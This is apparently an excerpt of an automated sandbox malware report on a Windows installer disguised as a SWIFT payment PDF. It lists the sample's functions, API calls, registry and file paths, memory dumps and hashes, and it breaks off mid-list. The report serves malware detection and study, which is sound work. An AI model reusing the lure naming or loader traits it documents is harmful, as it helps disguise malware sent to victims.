                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Close$DeleteEnumOpen
                                      • String ID:
                                      • API String ID: 1912718029-0
                                      • Opcode ID: 8d132b12fb4f7e3c0c57d0df483c4ead623641b1822a26b8d9db536e3ea124b7
                                      • Instruction ID: 1ad4598d9375e79b5c4158f8ae6fede31b6a0d7771ae0489b8e1e2a10aea7df0
                                      • Opcode Fuzzy Hash: 8d132b12fb4f7e3c0c57d0df483c4ead623641b1822a26b8d9db536e3ea124b7
                                      • Instruction Fuzzy Hash: 72116D31600108BFDF219F90DE48DAA3B6DEB55348B108036FA06A00A0D7B89E519F69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 100016DA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CCE
                                        • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CD3
                                        • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CD8
                                      • GlobalFree.KERNEL32(00000000), ref: 10001785
                                      • FreeLibrary.KERNEL32(?), ref: 100017FC
                                      • GlobalFree.KERNEL32(00000000), ref: 10001821
                                        • Part of subcall function 10002165: GlobalAlloc.KERNEL32(00000040,8A470175), ref: 10002197
                                        • Part of subcall function 10002540: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001756,00000000), ref: 100025B2
                                        • Part of subcall function 10001576: lstrcpyA.KERNEL32(00000000,?,00000000,100016B2,00000000), ref: 1000158F
                                        • Part of subcall function 1000236D: wsprintfA.USER32 ref: 100023D2
                                        • Part of subcall function 1000236D: GlobalFree.KERNEL32(?), ref: 1000248E
                                        • Part of subcall function 1000236D: GlobalFree.KERNEL32(00000000), ref: 100024B7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134294229538.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000006.00000002.134294192586.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.134294264369.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.134294303301.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_10000000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                      • String ID:
                                      • API String ID: 1767494692-3916222277
                                      • Opcode ID: 0952c09c6252a8ba46cc4746145f3c2b250c4692183d3e2bc8c66cf4bd3bffc0
                                      • Instruction ID: a4822a2f56843d2abdfa94b6917cafe90cab4d4c428c41a0756c8854a89f2b82
                                      • Opcode Fuzzy Hash: 0952c09c6252a8ba46cc4746145f3c2b250c4692183d3e2bc8c66cf4bd3bffc0
                                      • Instruction Fuzzy Hash: 3131AD759046059AFB41EF249CC9BDA37ECFF052D0F00C029FA09AA09EDF7499458BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend$Timeout
                                      • String ID: !
                                      • API String ID: 1777923405-2657877971
                                      • Opcode ID: 3698ce71db31f8b469170a2b9811606ddb50db903b10dbb8916321b005f99d26
                                      • Instruction ID: 12ae1f52ecf524c97be6b8063d2fdb139482407b097923a357ceac7fbdf5fe65
                                      • Opcode Fuzzy Hash: 3698ce71db31f8b469170a2b9811606ddb50db903b10dbb8916321b005f99d26
                                      • Instruction Fuzzy Hash: 43219271A44248AFEF01AFB4CD8AAAE7FB5EF44348F14443EF501B61E1D6B95940DB18
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401F68 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F93
                                        • Part of subcall function 00404E84: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000,0078F2A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000,?), ref: 00404EBD
                                        • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000,0078F2A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000), ref: 00404ECD
                                        • Part of subcall function 00404E84: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00402FA6,00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000,0078F2A8,007898A8), ref: 00404EE0
                                        • Part of subcall function 00404E84: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll), ref: 00404EF2
                                        • Part of subcall function 00404E84: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                        • Part of subcall function 00404E84: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                        • Part of subcall function 00404E84: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                      • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                      • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                      • String ID:
                                      • API String ID: 2987980305-0
                                      • Opcode ID: 0b3dc729bd951b2f0749e00079973c11294a56becaede699027b28deb442bc2b
                                      • Instruction ID: d3abe0a985e527f0133db3cb222e4045a6b822903cb71d54981d30858ec5e20d
                                      • Opcode Fuzzy Hash: 0b3dc729bd951b2f0749e00079973c11294a56becaede699027b28deb442bc2b
                                      • Instruction Fuzzy Hash: 01213032904211ABCF207F64CE49A6F79B0AF44358F20413BF601B62D1D7BD4E419A5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405712 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00405B77: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B84
                                        • Part of subcall function 004056BD: CharNextA.USER32(?,?,outvillain\faber.div,?,00405729,outvillain\faber.div,outvillain\faber.div,?,?,75EE3410,00405474,?,C:\Users\user\AppData\Local\Temp\,75EE3410,00000000), ref: 004056CB
                                        • Part of subcall function 004056BD: CharNextA.USER32(00000000), ref: 004056D0
                                        • Part of subcall function 004056BD: CharNextA.USER32(00000000), ref: 004056E4
                                      • lstrlenA.KERNEL32(outvillain\faber.div,00000000,outvillain\faber.div,outvillain\faber.div,?,?,75EE3410,00405474,?,C:\Users\user\AppData\Local\Temp\,75EE3410,00000000), ref: 00405765
                                      • GetFileAttributesA.KERNELBASE(outvillain\faber.div,outvillain\faber.div,outvillain\faber.div,outvillain\faber.div,outvillain\faber.div,outvillain\faber.div,00000000,outvillain\faber.div,outvillain\faber.div,?,?,75EE3410,00405474,?,C:\Users\user\AppData\Local\Temp\,75EE3410), ref: 00405775
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                      • String ID: outvillain\faber.div
                                      • API String ID: 3248276644-1876387199
                                      • Opcode ID: 948b862332c8f3da9c9767df0f5b65eb8bb3e35ca68fd5066b4b6d0f3dd8e5f9
                                      • Instruction ID: 9c3b755cb3c6d616dab6a000ce5f665f7bfd003de174882c1d400389f5d3e8f3
                                      • Opcode Fuzzy Hash: 948b862332c8f3da9c9767df0f5b65eb8bb3e35ca68fd5066b4b6d0f3dd8e5f9
                                      • Instruction Fuzzy Hash: 62F0C835105D5499C62237391D45AAF2658CD87364F180A3BF851B32D1DB3C8942BDAE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004030BB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00405DE2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,75EE3410,0040329C), ref: 00405E3A
                                        • Part of subcall function 00405DE2: CharNextA.USER32(?,?,?,00000000), ref: 00405E47
                                        • Part of subcall function 00405DE2: CharNextA.USER32(?,"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,75EE3410,0040329C), ref: 00405E4C
                                        • Part of subcall function 00405DE2: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,75EE3410,0040329C), ref: 00405E5C
                                      • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75EE3410,0040329C), ref: 004030DC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Char$Next$CreateDirectoryPrev
                                      • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 4115351271-2414109610
                                      • Opcode ID: 8e7680eb481f2e00cc16df113ff911000dfe49d9d02a3d1b6cba6af61926cd3a
                                      • Instruction ID: c9728f7b553dd8aa4c0e43ad66b561e8a411fb1fe81b444dc1201db4bd0af2db
                                      • Opcode Fuzzy Hash: 8e7680eb481f2e00cc16df113ff911000dfe49d9d02a3d1b6cba6af61926cd3a
                                      • Instruction Fuzzy Hash: 13D09222506D3122E99132263C06FCF1A4C8F8B35AF51817BF50A781855A6D1A92C9FE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405A5E Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExA.KERNELBASE(80000002,00405CA3,00000000,00000002,?,00000002,?,?,00405CA3,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405A87
                                      • RegQueryValueExA.KERNELBASE(?,?,00000000,00405CA3,?,00405CA3), ref: 00405AA8
                                      • RegCloseKey.KERNELBASE(?), ref: 00405AC9
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID:
                                      • API String ID: 3677997916-0
                                      • Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                      • Instruction ID: 3b0245f56489bc6861cff030ff267d915796a633b737c7f0fb79f2751f8918b0
                                      • Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                      • Instruction Fuzzy Hash: 74015A7114020AEFDB128F64EC88AEB3FACEF14394F044136F905A6260D235D964CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402438 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,00000527,00000000,00000022,00000000,?,?,?,004022CA,00000002), ref: 00402B39
                                      • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402466
                                      • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003,00020019), ref: 00402479
                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsv10BA.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040248E
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Enum$CloseOpenValue
                                      • String ID:
                                      • API String ID: 167947723-0
                                      • Opcode ID: e0a1bc4ab8869d2a121cb057061cf9ed2671c29535a9e67340b1f386ccbb16c1
                                      • Instruction ID: d28fcdc599a7f9727bcbc73a1b2195d927587ee9f1dfd2233f1a348fd0a26dbd
                                      • Opcode Fuzzy Hash: e0a1bc4ab8869d2a121cb057061cf9ed2671c29535a9e67340b1f386ccbb16c1
                                      • Instruction Fuzzy Hash: AEF0F472A04205EFE7119F689E8CEBF7A6CEF40348F10483FF105B61C0D6B95E41962A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402517 Relevance: 3.1, APIs: 2, Instructions: 79fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ReadFile.KERNELBASE(?,?,00000001,?,?,?,00000002), ref: 00402563
                                        • Part of subcall function 00405AD5: wsprintfA.USER32 ref: 00405AE2
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: FileReadwsprintf
                                      • String ID:
                                      • API String ID: 3326442220-0
                                      • Opcode ID: 14b2645a2d3aaee7aa82702909eb729c7392d646557c2fb458c46880e8a2d5aa
                                      • Instruction ID: 0299c1a24440926a7a2aae36e035f1b33a41ebd789bdaa0b01dbfd16c80bf010
                                      • Opcode Fuzzy Hash: 14b2645a2d3aaee7aa82702909eb729c7392d646557c2fb458c46880e8a2d5aa
                                      • Instruction Fuzzy Hash: 0F21E470D05299FFDF219B948E685AEBB759B01304F14417BF481B62D2D6BC8A81CB2D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004023C6 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,00000527,00000000,00000022,00000000,?,?,?,004022CA,00000002), ref: 00402B39
                                      • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004023F6
                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsv10BA.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040248E
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID:
                                      • API String ID: 3677997916-0
                                      • Opcode ID: b439f61bfe72f3706feb706b2374f9df9e561f3deb36810b4298d1c7e54b1251
                                      • Instruction ID: ce2297d9d5ce314a5bfea79886eaba96e34c70be170e39046d40c33bd9eb9c4f
                                      • Opcode Fuzzy Hash: b439f61bfe72f3706feb706b2374f9df9e561f3deb36810b4298d1c7e54b1251
                                      • Instruction Fuzzy Hash: DB119E31D05205EFDB15DF64CA889AFBBB4EF45344F20843FE446B62C0D2B85A41DB2A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
